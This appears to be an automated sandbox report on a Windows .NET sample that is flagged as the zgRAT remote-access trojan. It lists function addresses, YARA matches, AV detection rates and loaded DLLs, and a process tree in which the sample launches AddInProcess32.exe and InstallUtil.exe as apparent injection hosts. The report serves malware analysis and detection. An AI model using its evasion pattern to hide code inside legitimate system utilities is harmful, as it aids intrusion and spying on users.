Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79862F	0_2_0E79862F
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79260B	0_2_0E79260B
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E796EC0	0_2_0E796EC0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E796EBF	0_2_0E796EBF
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7956A8	0_2_0E7956A8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79EF68	0_2_0E79EF68
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79ACC8	0_2_0E79ACC8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79ACC3	0_2_0E79ACC3
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B202	0_2_0E79B202
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E7962A8	0_2_0E7962A8
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E796298	0_2_0E796298
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E798BF0	0_2_0E798BF0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E798BE1	0_2_0E798BE1
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B071	0_2_0E79B071
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B898	0_2_0E79B898
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B086	0_2_0E79B086
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B147	0_2_0E79B147
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B132	0_2_0E79B132
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79C9F0	0_2_0E79C9F0
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79B1ED	0_2_0E79B1ED
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Code function: 0_2_0E79C9E3	0_2_0E79C9E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02664C88	4_2_02664C88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02667380	4_2_02667380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02667F98	4_2_02667F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02669228	4_2_02669228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_05B32388	4_2_05B32388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_05B3A940	4_2_05B3A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_05B32379	4_2_05B32379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_05B3C2B0	4_2_05B3C2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E60B30	4_2_06E60B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E6EA70	4_2_06E6EA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E6EA3D	4_2_06E6EA3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07194F90	4_2_07194F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0719AD88	4_2_0719AD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071951C8	4_2_071951C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071989F0	4_2_071989F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071959E0	4_2_071959E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07193828	4_2_07193828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07190B31	4_2_07190B31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07190B88	4_2_07190B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07194F80	4_2_07194F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071947C0	4_2_071947C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0719EEC8	4_2_0719EEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07193AC8	4_2_07193AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07199120	4_2_07199120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07194158	4_2_07194158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0719F948	4_2_0719F948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07194148	4_2_07194148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071951B8	4_2_071951B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07193817	4_2_07193817
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07190007	4_2_07190007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07197830	4_2_07197830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07197820	4_2_07197820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07190040	4_2_07190040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BD750	4_2_071BD750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BB748	4_2_071BB748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BBE70	4_2_071BBE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BC840	4_2_071BC840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071B9888	4_2_071B9888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BB716	4_2_071BB716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BAB07	4_2_071BAB07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BD731	4_2_071BD731
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BFA98	4_2_071BFA98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BFA88	4_2_071BFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BE5F8	4_2_071BE5F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BF1F0	4_2_071BF1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BE5E9	4_2_071BE5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BF1E0	4_2_071BF1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071B0006	4_2_071B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BF85A	4_2_071BF85A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BF860	4_2_071BF860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_071BF4E0	4_2_071BF4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_07721618	4_2_07721618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0772C072	4_2_0772C072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0772C078	4_2_0772C078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06E60B17	4_2_06E60B17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00422440	8_2_00422440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00421A10	8_2_00421A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00404BD0	8_2_00404BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_004100C0	8_2_004100C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_004041D0	8_2_004041D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_004221E2	8_2_004221E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043B260	8_2_0043B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00408230	8_2_00408230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00403340	8_2_00403340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00406590	8_2_00406590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0041D5BE	8_2_0041D5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_004016F0	8_2_004016F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00403720	8_2_00403720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00405810	8_2_00405810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00416ADD	8_2_00416ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00406C20	8_2_00406C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_00426E67	8_2_00426E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0043AF20	8_2_0043AF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_0041DFC2	8_2_0041DFC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00F3E3E8	9_2_00F3E3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00F3E3D8	9_2_00F3E3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00F30878	9_2_00F30878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00F30868	9_2_00F30868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00F34DD0	9_2_00F34DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_050C86F4	9_2_050C86F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_050CB143	9_2_050CB143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_050CB150	9_2_050CB150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720A978	9_2_0720A978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720D288	9_2_0720D288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720DA08	9_2_0720DA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0720DA18	9_2_0720DA18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00408D60 appears 46 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00409450 appears 163 times

Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003110000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8PV.dll, vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003248000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTestConnection.exeB vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2412254219.0000000003248000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8PV.dll, vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2439979828.00000000099F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTestConnection.exeB vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2439288632.0000000008C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBingX API.dll4 vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2411628265.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8PV.dll, vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2423755750.00000000042F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBingX API.dll4 vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000000.1655457798.000000000086C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetUserFTA.exe6 vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2409875485.000000000128E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe, 00000000.00000002.2439979828.0000000009B37000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTestConnection.exeB vs 2M1NS61GG8.exe
Source: 2M1NS61GG8.exe	Binary or memory string: OriginalFilenameSetUserFTA.exe6 vs 2M1NS61GG8.exe

Source: 2M1NS61GG8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.AddInProcess32.exe.3939ec0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.AddInProcess32.exe.3ad4af8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.AddInProcess32.exe.3afcb18.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, Strings.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.AddInProcess32.exe.3afcb18.0.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, Strings.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.AddInProcess32.exe.3939ec0.1.raw.unpack, w9AvI2VIT4G5WFLFibf.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/7@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_0042A7F1 CoCreateInstance,

8_2_0042A7F1

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2M1NS61GG8.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Temp\TmpE8B6.tmp

Jump to behavior

Source: 2M1NS61GG8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2M1NS61GG8.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2M1NS61GG8.exe	ReversingLabs: Detection: 39%
Source: 2M1NS61GG8.exe	Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\2M1NS61GG8.exe "C:\Users\user\Desktop\2M1NS61GG8.exe"
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
